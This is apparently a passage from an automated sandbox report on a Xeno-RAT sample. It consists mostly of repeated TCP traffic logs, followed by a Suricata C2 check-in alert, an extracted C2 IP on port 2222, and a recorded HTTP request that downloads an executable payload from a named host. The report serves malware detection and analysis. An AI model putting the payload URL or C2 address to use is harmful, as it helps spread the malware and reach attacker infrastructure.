Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49193
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49193
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49194
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49194
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49195
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49195
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49196
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49196
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49197
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49197
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49198
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49198
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49199
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49199
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49200
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49200
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49201
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49201
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49202
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49202
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49203
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49203
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 87.120.120.27:2222
Source: global traffic	TCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49204
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 87.120.120.27:2222

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2050110 - Severity 1 - ET MALWARE [ANY.RUN] Xeno-RAT TCP Check-In : 87.120.120.27:2222 -> 192.168.2.22:49170

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 87.120.120.27

Source: global traffic

TCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222

Source: Joe Sandbox View

ASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic

HTTP traffic detected: GET /sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
